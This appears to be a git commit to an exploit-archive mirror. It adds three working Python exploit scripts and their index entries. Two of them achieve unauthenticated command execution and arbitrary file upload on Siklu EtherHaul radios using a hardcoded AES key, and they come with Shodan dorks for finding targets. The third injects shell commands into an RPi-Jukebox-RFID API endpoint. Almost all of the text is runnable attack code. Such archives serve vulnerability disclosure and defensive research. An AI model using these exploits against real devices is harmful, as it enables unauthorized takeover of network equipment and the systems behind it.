Merge remote-tracking branch 'upstream/main'

certcc-ghbot · certcc-ghbot · commit 29d6b7d89337 · 2026-01-19T13:05:51.000Z
diff --git a/exploits/multiple/webapps/52466.py b/exploits/multiple/webapps/52466.py
@@ -0,0 +1,129 @@
+# Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution
+# Shodan Dork: "EH-8010" or "EH-1200"
+# Date: 2025-08-02
+# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
+# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
+# Software Link: ftp://ftp.bubakov.net/siklu/
+# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
+# Tested on: Linux
+# CVE: CVE-2025-57174
+# Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/
+
+#!/usr/bin/env python3
+import argparse, socket, struct
+from Crypto.Cipher import AES
+
+PORT = 555
+HDR_LEN = 0x90
+IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
+KEY = bytes([
+    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
+    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
+    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
+    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
+])
+
+def recv_exact(sock: socket.socket, n: int) -> bytes:
+    out = bytearray()
+    while len(out) < n:
+        chunk = sock.recv(n - len(out))
+        if not chunk:
+            raise ConnectionError('socket closed')
+        out += chunk
+    return bytes(out)
+
+def pad16_zero(b: bytes) -> bytes:
+    r = len(b) & 0x0F
+    return b if r == 0 else (b + b'\x00' * (16 - r))
+
+def hdr_checksum(hdr: bytes) -> int:
+    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
+
+def build_header(flag: int, msg: int, payload_len: int) -> bytes:
+    hdr = bytearray(HDR_LEN)
+    hdr[0] = flag & 0xFF
+    hdr[1] = msg & 0xFF
+    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
+    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
+    return bytes(hdr)
+
+class RFPipeSession:
+    def __init__(self, key: bytes, iv0: bytes):
+        self.key = key
+        self.send_iv = iv0
+        self.recv_iv = iv0
+    def enc_send(self, sock: socket.socket, data: bytes) -> None:
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
+        ct = cipher.encrypt(data)
+        self.send_iv = ct[-16:]
+        sock.sendall(ct)
+    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
+        if n_plain <= 0:
+            return b''
+        n_padded = (n_plain + 15) & ~15
+        ct = recv_exact(sock, n_padded)
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
+        pt = cipher.decrypt(ct)
+        self.recv_iv = ct[-16:]
+        return pt[:n_plain]
+    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
+        if len(hdr_plain) != HDR_LEN:
+            raise ValueError('header must be 0x90 bytes')
+        self.enc_send(sock, hdr_plain)
+    def recv_header(self, sock: socket.socket) -> bytes:
+        ct = recv_exact(sock, HDR_LEN)
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
+        pt = cipher.decrypt(ct)
+        self.recv_iv = ct[-16:]
+        return pt
+
+def connect_any(host: str, port: int) -> socket.socket:
+    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
+    last_err = None
+    for fam, st, proto, _, sa in infos:
+        s = socket.socket(fam, st, proto)
+        try:
+            s.connect(sa)
+            return s
+        except Exception as e:
+            last_err = e
+            s.close()
+    raise ConnectionError(f'connect failed: {last_err}')
+
+def main():
+    ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)')
+    ap.add_argument('target', help='IPv4/IPv6 address')
+    ap.add_argument('command', help='command string (e.g., "mo-info system")')
+    ap.add_argument('--nul', action='store_true', help='append NUL terminator to command')
+    ap.add_argument('--recv', action='store_true', help='receive and print response')
+    args = ap.parse_args()
+
+    payload = args.command.encode('utf-8')
+    if args.nul:
+        payload += b'\x00'
+
+    hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload))
+    sess = RFPipeSession(KEY, IV0)
+
+    with connect_any(args.target, PORT) as s:
+        sess.send_header(s, hdr_plain)
+        if payload:
+            sess.enc_send(s, pad16_zero(payload))
+        if args.recv:
+            rh = sess.recv_header(s)
+            flag = rh[0]; rmsg = rh[1]
+            rlen = struct.unpack_from('<I', rh, 0x08)[0]
+            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
+            if rmsg in (0x03, 0x05):
+                return
+            if rlen:
+                body = sess.dec_recv(s, rlen)
+                if body.endswith(b'\x00'):
+                    body = body[:-1]
+                try:
+                    print(body.decode('utf-8', errors='replace'))
+                except Exception:
+                    print(body.hex())
+
+if __name__ == '__main__':
+    main()
diff --git a/exploits/multiple/webapps/52467.py b/exploits/multiple/webapps/52467.py
@@ -0,0 +1,131 @@
+# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
+# Shodan Dork: "EH-8010" or "EH-1200"
+# Date: 2025-08-02
+# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
+# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
+# Software Link: ftp://ftp.bubakov.net/siklu/
+# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
+# Tested on: Linux
+# CVE: CVE-2025-57176
+# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
+
+#!/usr/bin/env python3
+import argparse, socket, struct
+from Crypto.Cipher import AES
+
+PORT = 555
+HDR_LEN = 0x90
+IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
+KEY = bytes([
+    0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
+    0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
+    0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
+    0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
+])
+
+def recv_exact(sock: socket.socket, n: int) -> bytes:
+    out = bytearray()
+    while len(out) < n:
+        chunk = sock.recv(n - len(out))
+        if not chunk:
+            raise ConnectionError('socket closed')
+        out += chunk
+    return bytes(out)
+
+def pad16_zero(b: bytes) -> bytes:
+    r = len(b) & 0x0F
+    return b if r == 0 else (b + b'\x00' * (16 - r))
+
+def hdr_checksum(hdr: bytes) -> int:
+    return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
+
+def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
+    hdr = bytearray(HDR_LEN)
+    hdr[0] = flag & 0xFF
+    hdr[1] = msg & 0xFF
+    struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
+    p = path if path.endswith(b'\x00') else (path + b'\x00')
+    max_path = HDR_LEN - 0x10
+    hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
+    struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
+    return bytes(hdr)
+
+class RFPipeSession:
+    def __init__(self, key: bytes, iv0: bytes):
+        self.key = key
+        self.send_iv = iv0
+        self.recv_iv = iv0
+    def enc_send(self, sock: socket.socket, data: bytes) -> None:
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
+        ct = cipher.encrypt(data)
+        self.send_iv = ct[-16:]
+        sock.sendall(ct)
+    def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
+        if n_plain <= 0:
+            return b''
+        n_padded = (n_plain + 15) & ~15
+        ct = recv_exact(sock, n_padded)
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
+        pt = cipher.decrypt(ct)
+        self.recv_iv = ct[-16:]
+        return pt[:n_plain]
+    def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
+        if len(hdr_plain) != HDR_LEN:
+            raise ValueError('header must be 0x90 bytes')
+        self.enc_send(sock, hdr_plain)
+    def recv_header(self, sock: socket.socket) -> bytes:
+        ct = recv_exact(sock, HDR_LEN)
+        cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
+        pt = cipher.decrypt(ct)
+        self.recv_iv = ct[-16:]
+        return pt
+
+def connect_any(host: str, port: int) -> socket.socket:
+    infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
+    last_err = None
+    for fam, st, proto, _, sa in infos:
+        s = socket.socket(fam, st, proto)
+        try:
+            s.connect(sa)
+            return s
+        except Exception as e:
+            last_err = e
+            s.close()
+    raise ConnectionError(f'connect failed: {last_err}')
+
+def main():
+    ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
+    ap.add_argument('target', help='IPv4/IPv6 address')
+    ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
+    ap.add_argument('--file', required=True, help='local file to send as payload')
+    ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
+    args = ap.parse_args()
+
+    with open(args.file, 'rb') as f:
+        payload = f.read()
+    path_bytes = args.path.encode('utf-8')
+    hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)
+
+    sess = RFPipeSession(KEY, IV0)
+    with connect_any(args.target, PORT) as s:
+        sess.send_header(s, hdr_plain)
+        if payload:
+            sess.enc_send(s, pad16_zero(payload))
+        if args.recv:
+            rh = sess.recv_header(s)
+            flag = rh[0]; rmsg = rh[1]
+            rlen = struct.unpack_from('<I', rh, 0x08)[0]
+            print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
+            if rmsg in (0x03, 0x05):
+                return
+            if rlen:
+                body = sess.dec_recv(s, rlen)
+                if body.endswith(b'\x00'):
+                    body = body[:-1]
+                try:
+                    print(body.decode('utf-8', errors='replace'))
+                except Exception:
+                    print(body.hex())
+
+if __name__ == '__main__':
+    main()
diff --git a/exploits/multiple/webapps/52468.py b/exploits/multiple/webapps/52468.py
@@ -0,0 +1,46 @@
+# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution
+# Date: 2025-09-25
+# Exploit Author: Beatriz Fresno Naumova
+# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
+# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
+# Version: 2.8.0
+# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
+# CVE: CVE-2025-10327
+#
+# Description:
+# This PoC demonstrates an OS command injection vulnerability in the shuffle.php API endpoint.
+# The vulnerable parameter "playlist" is passed directly to a shell command without sanitization,
+# allowing an attacker to execute arbitrary system commands.
+
+import requests
+import json
+
+# Replace this with the actual target IP or hostname
+TARGET = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php"
+
+# Payload to inject – here we create a file as proof of execution
+INJECTED_COMMAND = "test';touch rced_by_xu17.txt;echo '"
+
+# JSON payload for the request
+payload = {
+    "playlist": INJECTED_COMMAND,
+    "shuffle": "true"
+}
+
+# HTTP headers
+headers = {
+    "Content-Type": "application/json",
+    "User-Agent": "Mozilla/5.0"
+}
+
+def exploit():
+    print("[+] Sending malicious JSON payload to trigger command injection...")
+    try:
+        response = requests.put(TARGET, headers=headers, data=json.dumps(payload), timeout=5)
+        print(f"[+] HTTP Status Code: {response.status_code}")
+        print("[*] If the target is vulnerable, the command should be executed on the server.")
+    except Exception as e:
+        print(f"[-] Exploit failed: {e}")
+
+if __name__ == "__main__":
+    exploit()
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -12411,6 +12411,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip,
 52324,exploits/multiple/webapps/52324.NA,"Roundcube 1.6.10 - Remote Code Execution (RCE)",2025-06-13,"Maksim Rogov",webapps,multiple,,2025-06-13,2025-06-13,0,CVE-2025-49113,,,,,
 52127,exploits/multiple/webapps/52127.py,"Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2023-5360,,,,,
+52468,exploits/multiple/webapps/52468.py,"RPi-Jukebox-RFID 2.8.0 - Remote Command Execution",2026-01-17,"Beatriz Fresno Naumova",webapps,multiple,,2026-01-17,2026-01-17,0,CVE-2025-10327,,,,,
 11405,exploits/multiple/webapps/11405.txt,"RSA - SecurID Cross-Site Scripting",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,OSVDB-43844;CVE-2008-1470,,,,,
 48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@@ -12449,6 +12450,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
+52467,exploits/multiple/webapps/52467.py,"Siklu EtherHaul Series EH-8010 - Arbitrary File Upload",2026-01-17,semaja2,webapps,multiple,,2026-01-17,2026-01-17,0,CVE-2025-57176,,,,,
+52466,exploits/multiple/webapps/52466.py,"Siklu EtherHaul Series EH-8010 - Remote Command Execution",2026-01-17,semaja2,webapps,multiple,,2026-01-17,2026-01-17,0,CVE-2025-57174,,,,,
 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
 52371,exploits/multiple/webapps/52371.py,"Simple File List WordPress Plugin 4.2.2 - File Upload to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2020-36847,,,,,
 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
